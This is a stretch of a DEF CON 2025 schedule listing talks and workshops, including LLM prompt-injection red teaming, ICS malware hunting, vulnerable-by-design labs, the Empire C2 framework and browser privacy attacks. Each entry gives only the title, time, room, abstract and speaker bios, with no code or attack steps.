While there is increasing content on attacking LLMs hitting the Internet (and at DEFCON), much of it is focused on attacking LLMs from more of a penetration-test perspective without putting the attacks into the broader context of a Red Team operation. As with any technology that we encounter in a network during a Red Team exercise, we should be familiar with how to use it to achieve goals like lateral movement or privilege escalation. Like it or not, in the near future that will increasingly include LLM-based applications and agents.

This session aims to close that gap. The speakers will start with some entry-level theory on how LLMs function under the hood. No math experience? No problem. We're going to keep things at a nice, high level with special focus on the core functionality of LLMs that enables attacks.

After addressing the theory, the speakers will shift to real-world attacks on LLMs drawn from our operations. This will take two forms: strategies to break LLMs through direct and indirect prompt injection, and ways to take a successful prompt injection and turn it into progress toward your Red Team objectives like enumeration, lateral movement, privilege escalation, or execution.

With the groundwork laid, the workshop will close with a hands-on, multi-level CTF for participants to try some of the direct and indirect prompt injection strategies discussed in the workshop.

Detailed Agenda: 1. Introductions (2 mins) 2. Theory: a. Neural Networks (10 mins) b. LLMs (10 mins) 3. Attack Strategies (15 mins) a. Direct prompt injection strategies + war stories b. Indirect prompt injection strategies + war stories 4. Hands-on CTF (20 mins) 5. Q&A (remainder)

Speakers:Alex Bernier,Brent Harrell

SpeakerBio:  Alex Bernier

I love breaking applications and AI systems!

SpeakerBio:  Brent Harrell

Brent is the author of the Red Team Capability Maturity Model and has led and created Red Teams at multiple organizations. He's now on the consulting side of Red Teaming and is one of the initial members of the company's new AI Red Team focused on LLM-based applications. With a background in traditional AD operations, though, much of his focus of late has been on bridging the gap between attacking LLMs directly and using them as part of greater operations.


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Sunday - 10:30-10:59 PDT


Title: Don’t Cry Wolf: Evidence-based assessments of ICS Threats
When: Sunday, Aug 10, 10:30 - 10:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

ICS Malware is rare. Yet, ICS Malware like FrostyGoop and TRISIS, and related discoveries like COSMICENERGY, were all found on VirusTotal, so analysts still hunt for novel ICS Malware in public malware repositories. In the process, they discover all kinds of tools: research, CTFs, obfuscated nonsense code with no effects, and sometimes, malware targeting ICS/OT sites. But how do they find and filter out the benign from malicious? Or the ICS and ICS-related malware from regular IT malware?

In this talk, we will use recently discovered samples to walk through the process of hunting and analyzing potential ICS threats. We’ll show the simple queries we use to cast a net, our typical analysis process, and relevant follow-on actions like victim notification. Lastly, we’ll discuss how we decide whether a sample is ICS malware using Dragos’s ICS malware definition.

Speakers:Jimmy Wylie,Sam Hanson

SpeakerBio:  Jimmy Wylie, Dragos

Jimmy Wylie is a malware analyst at Dragos, Inc., who searches for and analyzes threats to critical infrastructure. He was the lead analyst on PIPEDREAM, the first ICS attack ""utility belt"", and TRISIS, the first malware to target a safety instrumented system. Formerly a DoD Contractor and malware analysis instructor, he has over 14 years of experience with reverse engineering and malware analysis. In his off-time, Jimmy enjoys playing board games, solving crossword puzzles, and testing the limits of his library card. He can be found on BlueSky: @mayahustle.bsky.social

SpeakerBio:  Sam Hanson, Dragos

Sam is currently an Associate Principal Vulnerability Analyst at Dragos where he researches vulnerabilities and malware impacting OT/ICS systems. Specifically, Sam discovers 0-day vulnerabilities in industrial software and threat hunts for ICS-related malware in public data sources. Sam has analyzed notable ICS-related malware, including components of PIPEDREAM and Fuxnet. Sam has presented at several cybersecurity conferences, including Dragos’ DISC (’22 and ’23), DISC:EU ‘24, and BSides:Zurich.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 12:00-12:45 PDT


Title: DVBE - Damn Vulnerable Browser Extension
When: Friday, Aug 8, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

In the continuously evolving world of browser extensions, security remains a big concern. As the demand of feature-rich extensions increases, priority is given to functionality over robustness, which makes way for vulnerabilities that can be exploited by malicious actors. The danger increases even more for organizations handling sensitive data like banking details, PII, confidential org reports, etc. Damn Vulnerable Browser Extension (DVBE) is an open-source vulnerable browser extension, designed to shed light on the importance of writing secure browser extensions and to educate developers and security professionals about the vulnerabilities and misconfigurations that are found in browser extensions, how they are found, and how they impact business. This built-to-be-vulnerable extension can be used to learn, train, and exploit browser extension-related vulnerabilities.

SpeakerBio:  Abhinav Khanna

Abhinav is an information security professional with 6+ years of experience. Having worked at organisations like S&P Global and NotSoSecure, his area of expertise lies in web appsec, mobile appsec, API security, and browser extension security. He has spoken at multiple conferences like Black Hat Asia, Black Hat Europe, and Black Hat MEA. In his free time, he likes playing table tennis.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 11:00-11:45 PDT


Title: DVBE - Damn Vulnerable Browser Extension
When: Saturday, Aug 9, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

In the continuously evolving world of browser extensions, security remains a big concern. As the demand of feature-rich extensions increases, priority is given to functionality over robustness, which makes way for vulnerabilities that can be exploited by malicious actors. The danger increases even more for organizations handling sensitive data like banking details, PII, confidential org reports, etc. Damn Vulnerable Browser Extension (DVBE) is an open-source vulnerable browser extension, designed to shed light on the importance of writing secure browser extensions and to educate developers and security professionals about the vulnerabilities and misconfigurations that are found in browser extensions, how they are found, and how they impact business. This built-to-be-vulnerable extension can be used to learn, train, and exploit browser extension-related vulnerabilities.

SpeakerBio:  Abhinav Khanna

Abhinav is an information security professional with 6+ years of experience. Having worked at organisations like S&P Global and NotSoSecure, his area of expertise lies in web appsec, mobile appsec, API security, and browser extension security. He has spoken at multiple conferences like Black Hat Asia, Black Hat Europe, and Black Hat MEA. In his free time, he likes playing table tennis.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 09:00-09:45 PDT


Title: Dyna - Automating the OWASP MASTG with Offensive Android Tactics
When: Friday, Aug 8, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Dyna is a full-spectrum Android security auditing framework designed to automate the OWASP MASTG checklist using both static and dynamic analysis. Built for red teams, appsec engineers, and mobile researchers, Dyna combines Frida, Drozer, PyGhidra, and ADB-based techniques into a modular pipeline that evaluates app permissions, exported components, crypto misuse, insecure storage, IPC abuse, native binary risks, and reverse engineering resilience. It can detect traversal, SQLi, hardcoded secrets, and debuggable builds, while reverse engineering .so files using Ghidra in headless mode. Dyna also features real-time logcat parsing and deep link/URL extraction to trace third-party leaks and misconfigurations. With colored output, structured reports, and an extensible architecture, Dyna turns OWASP MASTG from a checklist into a powerful automated testing workflow.

Speakers:Arjun "T3R4_KAAL" Chaudhary,Ayodele Ibidapo

SpeakerBio:  Arjun "T3R4_KAAL" Chaudhary

Arjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.

SpeakerBio:  Ayodele Ibidapo

Ayodele is a cybersecurity consultant and application penetration tester with over 15 years of experience strengthening enterprise security architecture, risk governance, and secure DevSecOps practices across finance, telecom, and manufacturing sectors. His expertise spans mobile, web, and containerized applications, where he developed taint flow analyzers, automated vulnerability discovery workflows, and built custom static and dynamic analysis tools to uncover complex security flaws. He holds a Master’s in Information Systems Security Management from Concordia University of Edmonton and a B.Eng. from the University of Portsmouth. His research on CVSS v2 environmental scoring was presented at IEEE’s international conference at MIT, and he continues to bridge deep technical testing with strategic design to deliver resilient, risk-informed solutions.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 15:00-15:45 PDT


Title: Dyna - Automating the OWASP MASTG with Offensive Android Tactics
When: Saturday, Aug 9, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Dyna is a full-spectrum Android security auditing framework designed to automate the OWASP MASTG checklist using both static and dynamic analysis. Built for red teams, appsec engineers, and mobile researchers, Dyna combines Frida, Drozer, PyGhidra, and ADB-based techniques into a modular pipeline that evaluates app permissions, exported components, crypto misuse, insecure storage, IPC abuse, native binary risks, and reverse engineering resilience. It can detect traversal, SQLi, hardcoded secrets, and debuggable builds, while reverse engineering .so files using Ghidra in headless mode. Dyna also features real-time logcat parsing and deep link/URL extraction to trace third-party leaks and misconfigurations. With colored output, structured reports, and an extensible architecture, Dyna turns OWASP MASTG from a checklist into a powerful automated testing workflow.

Speakers:Arjun "T3R4_KAAL" Chaudhary,Ayodele Ibidapo

SpeakerBio:  Arjun "T3R4_KAAL" Chaudhary

Arjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.

SpeakerBio:  Ayodele Ibidapo

Ayodele is a cybersecurity consultant and application penetration tester with over 15 years of experience strengthening enterprise security architecture, risk governance, and secure DevSecOps practices across finance, telecom, and manufacturing sectors. His expertise spans mobile, web, and containerized applications, where he developed taint flow analyzers, automated vulnerability discovery workflows, and built custom static and dynamic analysis tools to uncover complex security flaws. He holds a Master’s in Information Systems Security Management from Concordia University of Edmonton and a B.Eng. from the University of Portsmouth. His research on CVSS v2 environmental scoring was presented at IEEE’s international conference at MIT, and he continues to bridge deep technical testing with strategic design to deliver resilient, risk-informed solutions.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 12:30-13:15 PDT


Title: Edge of Tomorrow: Foiling Large Supply Chain Attacks By Taking 5k Abandoned S3 Buckets from Malware and Benign Software
When: Friday, Aug 8, 12:30 - 13:15 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:
Imagine one sunny morning you read the news: A crypto worm targets 100+ organizations around the world. The authorities estimate that during the first days of attack ~28,000 hosts in 158 countries were affected, including 24 nation state and European union assets, major banks and tech companies. Since then, the worm has spread and is now everywhere. The industry doesn't know the main source of attack. There are many backdoored artifacts reportedly used by the victims with no obvious connections.

Eventually, a security researcher connects all dots and finds the source: compromised, abandoned AWS S3 buckets. The risk that researchers warned in the past materialized on a truly gigantic scale, 5155 buckets were affected.

Luckily, this incident has never happened. The buckets used in that hypothetical scenario were claimed by a security researcher and taken down by the Cloud provider.

In this talk, we will dissect the anatomy of such an attack. We will show that adversaries equipped with instruments of big data analysis and custom LLM-agents can take these scenarios to the next level by automating and scaling them. We will share statistical insights and 9 concrete stories illustrating potential victim profiles and attack vectors. Finally, we will discuss remediation actions that would eliminate the risk once and for all.

References:

  1. link
  2. link
  3. link
  4. link
  5. link
  6. link
  7. link
  8. link
  9. link
  10. link
  11. link
  12. link
  13. link
  14. link
  15. link
  16. link
  17. link
  18. link
  19. link
  20. link
SpeakerBio:  Maksim Shudrak

Maksim is an offensive security researcher and engineer with more than a decade of experience in red teaming, malware analysis, and exploit development complemented by a PhD in machine code vulnerability detection. He loves searching for complex large-scale issues in modern technologies and outlining their impact.

Maksim is an author of open-source tools for scanning cloud infrastructure, fuzzing, and dynamic malware analysis which he presented at various conferences such as DEF CON, VirusBulletin, and BlackHat Arsenal.


Return to Index    -    Add to Google    -    ics Calendar file

QTV - Friday - 12:00-12:59 PDT


Title: EduQ: A DIY Self-Education Platform for Hackers to Break, Build, and Experiment with Quantum-Secured Networks
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall1-W206 - Map

Description:

Quantum security is mysterious, expensive, and locked behind corporate and academic walls. But hackers don't wait for permission to learn. What if you could build your own quantum hacking lab, right in your garage?

SpeakerBio:  Yann Allain
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 19:00-21:59 PDT


Title: EFF Tech Trivia
When: Saturday, Aug 9, 19:00 - 21:59 PDT
Where: LVCCWest-Level1-Atrium-East-Contest Stage

Description:

EFF's team of technology experts have crafted challenging trivia about the fascinating, obscure, and trivial aspects of digital security, online rights, and Internet culture. Competing teams will plumb the unfathomable depths of their knowledge, but only the champion hive mind will claim the First Place Tech Trivia Badge and EFF swag pack. The second and third place teams will also win great EFF gear.

Participant Prerequisites

No prerequisites! Just a desire to have fun and come answer some trivia questions. Participants will need to join a team which they can create beforehand or join one ad-hoc during the event!

Pre-Qualification

None


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 15:30-16:30 PDT


Title: EFF/Hackers.town RayHunter build clinic
When: Friday, Aug 8, 15:30 - 16:30 PDT
Where: LVCCWest-Level1-Hall4-Communities-C102 - Map

Description:

Come out and build EFF’s Rayhunter! ($10 materials fee EFF Donation)


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 09:00-12:59 PDT


Title: Effectively Detecting Modern Malware with Volatility 3
When: Friday, Aug 8, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N253 - Map

Description:

Volatility 3 is the latest version of the Volatility Memory Analysis framework and is a complete re-design and rewrite of the framework suited to meet the needs of modern investigations. In this workshop, students will learn Volatility 3’s new features aimed at efficiency and usability as well as all the new and updated Windows plugins capable of detecting modern malware. During the workshop, students will experience a mix of lecture and live demonstration about the latest malware techniques followed by hands-on labs that will require students to analyze infected memory samples. While students complete each lab, instructors will walk to each student’s station to ensure they are progressing. An instructor will also completely walk through each lab live, and students are given a 35+ page PDF lab guide that contains all the lab scenarios, questions, and detailed answers, including many screenshots and explanations. Students can then use the course slides and lab guide to practice labs over time as well as to guide real-world investigations of compromised systems. By attending this workshop, students will leave knowing the most effective ways to detect modern Windows malware using the latest version of the mostly widely used open-source framework for memory analysis.

Speakers:Andrew Case,Lauren Pace,Daniel Donze

SpeakerBio:  Andrew Case, Director of Research at Volexity

Andrew Case is the Director of Research at Volexity and has significant experience in incident response handling, digital forensics, and malware analysis. Case is a core developer of Volatility, the most widely used open-source memory forensics framework, and a co-author of the highly popular and technical forensics analysis book "The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory." Case has spoken at many industry conferences, including DEF CON, Black Hat, RSA, DFRWS, SecTor, BSides*, and OMFW.

SpeakerBio:  Lauren Pace, Computer Science PhD Student at LSU

Lauren Pace is a PhD Student Researcher at Louisiana State University. She is a recipient of a Scholarship for Service scholarship and is performing funded research on complex problems and topics in memory forensics. Lauren has delivered Volatility 3 workshops at conferences, such as DFRWS, and is actively involved in her local cybersecurity clubs and community.

SpeakerBio:  Daniel Donze

Daniel Donze (He/Him) is a PhD Student Researcher in Computer Science at Louisiana State University. His research has previously contributed to the Volatility Framework, and his current interests include memory forensics and malware analysis. He has presented research at BSides Las Vegas as well as several local events. He previously worked as a fullstack web and software developer and security researcher. His hobbies include cooking, playing guitar, mixology and craft beer.


Return to Index    -    Add to Google    -    ics Calendar file

PSV - Sunday - 10:00-10:59 PDT


Title: Elevators 101
When: Sunday, Aug 10, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Elevator floor lockouts are often used as an additional, or the only, layer of security. This talk will focus on how to correctly incorporate elevators into your security design, and how badly set up elevators could be used to access restricted areas– including using special operating modes, tricking the controller into taking you there, and hoistway entry.

Speakers:Bobby Graydon,Ege Feyzioglu

SpeakerBio:  Bobby Graydon, Physical Security Village

Bobby is involved in the planning of Physical Security Village. He enjoys anything mechanical and is currently serving as VP R&D at GGR Security Consultants. I like trains and milk.

SpeakerBio:  Ege Feyzioglu, Physical Security Village

Ege is a security researcher specialising in access control systems and electronics. She is currently pursuing a degree in Electrical Engineering and work part-time for GGR Security as a Security Risk Assessor


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 09:00-12:59 PDT


Title: Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense
When: Saturday, Aug 9, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N254 - Map

Description:

Traditional patching has failed to scale - it’s time for a new approach. This hands-on workshop teaches you to eliminate entire bug classes with modern browser security features instead of endlessly reacting to reports. Instead of firefighting the same issues, you’ll learn how Content-Security-Policy v3, Trusted Types, and Sec-Fetch-Metadata go beyond traditional OWASP recommendations to prevent vulnerabilities at scale.

You’ll work with a training app that’s already secured, but we’ll go further. By applying advanced browser defenses, testing effectiveness, and enforcing security at scale, you’ll experience firsthand how modern web standards protect both new and legacy systems.

This isn’t just about fixing issues - it’s about scaling security across an organization. We’ll explore measuring adoption across hundreds of services, automating enforcement, and applying defense-in-depth beyond single vulnerabilities.

Through interactive group challenges, you’ll tackle real-world vulnerabilities, enforce modern safeguards, and transform how you approach web security. Whether you’re a developer, security engineer, or architect, you’ll leave with practical tools and a proactive security mindset - moving from patching to prevention.

SpeakerBio:  Javan Rasokat, Application Security Architect and Security Researcher

Javan is a Senior Application Security Specialist at Sage, helping product teams enhance security throughout the software development lifecycle. On the side, he lectures Secure Coding at DHBW University in Germany. His journey as an ethical hacker began young, where he began to automate online games using bots and identified security bugs, which he then reported to the game operators. Javan made his interests into his profession and began as a full stack web and mobile engineer before transitioning into a passionate security consultant. Javan holds a Master’s degree in IT Security Management and several certifications, including GXPN, AIGP, CISSP, CCSP, and CSSLP. He has shared his research at conferences, including OWASP Global AppSec, DEFCON, and HITB.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Sunday - 09:00-12:59 PDT


Title: EMMC BGA Secrets, hack bga memory, no reballing necessary: Learn how to safely remove EMMC memory modules, hack them and then reinstall, without the difficult process of trying to reball the BGA.
When: Sunday, Aug 10, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N260 - Map

Description:

EMMC is a common flash memory format for more complex embedded devices and the Ball Grid Array (BGA) is a popular format for EMMC modules. BGA modules can be intimidating to hardware hackers since the pins are not exposed and are instead underneath the chip. This workshop will demonstrate and allow you to practice removing EMMC modules from an inexpensive circuit board using flux and a hot air station. The module will contain a Linux operating system and a Raspberry Pi. Workshop participants will learn how to image the removed EMMC. Mount and change the Linux filesystem in order to backdoor the image and gain access, and then learn how to copy the image to a new EMMC. Participants will then learn how to attach the module to a BGA carrier board with hot air.

A basic understanding of soldering is all that is required to be successful in this workshop. An understanding of the Linux filesystem is also helpful, but not required. We will have step by step instructions and will also have a small prize for the participant who comes up with and demonstrates the most clever Linux backdoor on their Raspberry Pi.

At the end of this workshop, participants will have an understanding of: How to remove, clean and image BGA modules Basics of offline Linux filesystem hacking How to image and reattach BGA EMMC modules

SpeakerBio:  Patrick "Gigstorm" Kiley, Principal Red-Team Consultant at Mandiant/Google

Patricck is a Principal Red Team Consultant at Mandiant with over 20 years of information security experience working with both US Govt and private sector employers. Patrick has spoken at DEF CON, BlackHat, Bsides and RSA. Patrick can usually be found in the Car Hacking or Aerospace village where he volunteered for several years. His passion is embedded systems security and has released research in Avionics, embedded systems and even bricked his own Tesla while trying to make it faster.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 11:00-11:45 PDT


Title: Empire 6.0
When: Saturday, Aug 9, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

Empire 6.0 is the latest evolution of the Command and Control (C2) framework. This major release introduces powerful new capabilities, including Go-based agents for enhanced cross-platform compatibility, a completely overhauled Empire compiler for streamlined payload deployment, and an integrated plugin marketplace in Starkiller. Enhanced module systems, dynamic option handling, Beacon Object File integration, and advanced remote script execution further expand Empire's capabilities. Empire continues to provide cryptographically secure communications and direct integration with the MITRE ATT&CK framework to emulate real-world Advanced Persistent Threat tactics, techniques, and procedures. This demo lab will highlight these significant advancements and demonstrate Empire 6.0's state-of-the-art capabilities.

Speakers:Vincent "Vinnybod" Rose,Jake "Hubble" Krasnov

SpeakerBio:  Vincent "Vinnybod" Rose, Confluent

Vincent "Vinnybod" Rose is the Lead Developer for Empire and Starkiller. He is a software engineer with a decade of expertise in building highly scalable cloud services, improving developer operations, and automation. Recently, his focus has been on the reliability and stability of the Empire C2 server. Vinnybod has presented at Black Hat and has taught courses at DEF CON on Red Teaming and Offensive PowerShell. He currently maintains a cybersecurity blog focused on offensive security at https://www.bc-security.org/blog/.

SpeakerBio:  Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC Security

Jake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 12:00-12:45 PDT


Title: Empire 6.0
When: Friday, Aug 8, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Empire 6.0 is the latest evolution of the Command and Control (C2) framework. This major release introduces powerful new capabilities, including Go-based agents for enhanced cross-platform compatibility, a completely overhauled Empire compiler for streamlined payload deployment, and an integrated plugin marketplace in Starkiller. Enhanced module systems, dynamic option handling, Beacon Object File integration, and advanced remote script execution further expand Empire's capabilities. Empire continues to provide cryptographically secure communications and direct integration with the MITRE ATT&CK framework to emulate real-world Advanced Persistent Threat tactics, techniques, and procedures. This demo lab will highlight these significant advancements and demonstrate Empire 6.0's state-of-the-art capabilities.

Speakers:Vincent "Vinnybod" Rose,Jake "Hubble" Krasnov

SpeakerBio:  Vincent "Vinnybod" Rose, Confluent

Vincent "Vinnybod" Rose is the Lead Developer for Empire and Starkiller. He is a software engineer with a decade of expertise in building highly scalable cloud services, improving developer operations, and automation. Recently, his focus has been on the reliability and stability of the Empire C2 server. Vinnybod has presented at Black Hat and has taught courses at DEF CON on Red Teaming and Offensive PowerShell. He currently maintains a cybersecurity blog focused on offensive security at https://www.bc-security.org/blog/.

SpeakerBio:  Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC Security

Jake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 17:00-17:45 PDT


Title: Emulating Embedded Linux Devices at Scale with Light-Touch Firmware Rehosting
When: Friday, Aug 8, 17:00 - 17:45 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

We will present a higher-level “rehosting” approach to the emulation of embedded Linux systems.

While most existing embedded Linux emulation frameworks work in userspace, we try not to touch userspace or modify a firmware image at all. Instead, we take a higher-level and somewhat “hybrid” approach, which involves building patched Linux kernels and using modified or custom QEMU machines. We do this to model the terrain of a system as closely as possible to that which a userspace firmware image expects, allowing userspace to run essentially unimpeded.

This approach involves a considerable amount of reverse-engineering of userspace binaries and libraries, alongside poring over whatever GPL code we can find, in order to write kernel patches, dummy drivers and make QEMU changes “reactively”. Our goal is to end up with a rehosting environment which, from the perspective of userspace, looks almost exactly like the real system.

References:

All the following provided inspiration, although our methodology is different: - Firmguide - Firmadyne - EMUX - Jetset

SpeakerBio:  Sigusr Polke

Sigusr Polke is the single-use pseudonym of a security researcher, who's spent a lot of time poking at embedded systems over the years.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 15:00-15:50 PDT


Title: EncryptedClientHelloWorld: TLSv1.3 ECH As A Covert C2 Channel
When: Friday, Aug 8, 15:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 4 - Map

Description:

This workshop will cover the fundamentals of Transport Layer Security (TLS) version 1.3, the latest Encrypted Client Hello (ECH) extension, and its application as a Command and Control (C2) technique to bypass network defenses.

SpeakerBio:  Jose Plascencia

Jose is an experienced Red Teamer who dabbles in system administration, reverse engineering, and coding with Rust.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 13:40-14:15 PDT


Title: Enshittification: It's Over 9000
When: Saturday, Aug 9, 13:40 - 14:15 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
Speakers:Lena "LambdaMamba" Yu,Andrew Brandt,Samuel Gasparro,Daniel Ward

SpeakerBio:  Lena "LambdaMamba" Yu, CEO at World Cyber Health
No BIO available
SpeakerBio:  Andrew Brandt
No BIO available
SpeakerBio:  Samuel Gasparro
No BIO available
SpeakerBio:  Daniel Ward
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 12:00-12:45 PDT


Title: EntraGoat - A Deliberately Vulnerable Entra ID Environment
When: Friday, Aug 8, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

EntraGoat is a deliberately vulnerable environment designed to simulate real-world security misconfigurations and attack scenarios in Microsoft Entra ID (formerly Azure Active Directory). Security professionals, researchers, and red teamers can leverage EntraGoat to gain hands-on experience identifying and exploiting identity and access management vulnerabilities, privilege escalation paths, and other security flaws specific to cloud-based Entra ID environments. EntraGoat is tailored specifically to help security practitioners understand and mitigate the risks associated with cloud identity infrastructures. The project provides a CTF-style learning experience, covering a range of misconfigurations, insecure policies, token abuses, and attack paths commonly exploited in real-world Entra ID breaches. By using EntraGoat, security teams can enhance their skills in Entra ID security, validate detection and response capabilities, and develop effective hardening strategies.

Speakers:Tomer Nahum,Jonathan Elkabas

SpeakerBio:  Tomer Nahum, Security Researcher at Semperis

Tomer is a security researcher at Semperis, where he works to find new attacks and how to defend against them in on-prem identity stacks such as Active Directory, as well as cloud identity systems. He was awarded Most Valuable Researcher (MVR) in 2023 by Microsoft Security Response Center (MSRC).

SpeakerBio:  Jonathan Elkabas

Jonathan is a security researcher at Semperis, specializing in Entra ID and Active Directory security. With expertise in identity-based threats, he focuses on analyzing attack techniques, developing detection strategies, and enhancing defenses against evolving cyber threats. He actively contributes to the security community through research, threat intelligence sharing, and speaking engagements.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 12:00-12:45 PDT


Title: EntraGoat - A Deliberately Vulnerable Entra ID Environment
When: Saturday, Aug 9, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

EntraGoat is a deliberately vulnerable environment designed to simulate real-world security misconfigurations and attack scenarios in Microsoft Entra ID (formerly Azure Active Directory). Security professionals, researchers, and red teamers can leverage EntraGoat to gain hands-on experience identifying and exploiting identity and access management vulnerabilities, privilege escalation paths, and other security flaws specific to cloud-based Entra ID environments. EntraGoat is tailored specifically to help security practitioners understand and mitigate the risks associated with cloud identity infrastructures. The project provides a CTF-style learning experience, covering a range of misconfigurations, insecure policies, token abuses, and attack paths commonly exploited in real-world Entra ID breaches. By using EntraGoat, security teams can enhance their skills in Entra ID security, validate detection and response capabilities, and develop effective hardening strategies.

Speakers:Tomer Nahum,Jonathan Elkabas

SpeakerBio:  Tomer Nahum, Security Researcher at Semperis

Tomer is a security researcher at Semperis, where he works to find new attacks and how to defend against them in on-prem identity stacks such as Active Directory, as well as cloud identity systems. He was awarded Most Valuable Researcher (MVR) in 2023 by Microsoft Security Response Center (MSRC).

SpeakerBio:  Jonathan Elkabas

Jonathan is a security researcher at Semperis, specializing in Entra ID and Active Directory security. With expertise in identity-based threats, he focuses on analyzing attack techniques, developing detection strategies, and enhancing defenses against evolving cyber threats. He actively contributes to the security community through research, threat intelligence sharing, and speaking engagements.


Return to Index    -    Add to Google    -    ics Calendar file

CPV - Sunday - 10:00-10:30 PDT


Title: Escaping the Privacy Sandbox with Client-Side Deanonymization Attacks
When: Sunday, Aug 10, 10:00 - 10:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Google's Privacy Sandbox initiative aims to provide privacy-preserving alternatives to third-party cookies by introducing new web APIs. This talk will examine potential client-side deanonymization attacks that can compromise user privacy by exploiting vulnerabilities and misconfigurations within these APIs.

I will explore the Attribution Reporting API, detailing how debugging reports can bypass privacy mechanisms like Referrer-Policy, potentially exposing sensitive user information. I will also explain how destination hijacking, in conjunction with a side-channel attack using storage limit oracles, can be used to reconstruct browsing history, demonstrating a more complex deanonymization technique.

Additionally, I will cover vulnerabilities in the Shared Storage API, illustrating how insecure cross-site worklet code can leak data stored within Shared Storage, despite the API being deliberately designed to prevent direct data access. Real-world examples and potential attack scenarios will be discussed to highlight the practical implications of these vulnerabilities.

The presentation will conclude by emphasizing the critical need for rigorous security and privacy research to ensure that Privacy Sandbox APIs effectively protect user data and achieve their intended privacy goals, given the complexity and potential for unintended consequences in their design and implementation.

SpeakerBio:  Eugene "spaceraccoon" Lim

Eugene Lim is a security researcher and white hat hacker. From Amazon to Zoom, he has helped secure applications from a range of vulnerabilities. His work has been featured at top conferences such as Black Hat, DEF CON, and industry publications like WIRED and The Register.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 16:30-17:15 PDT


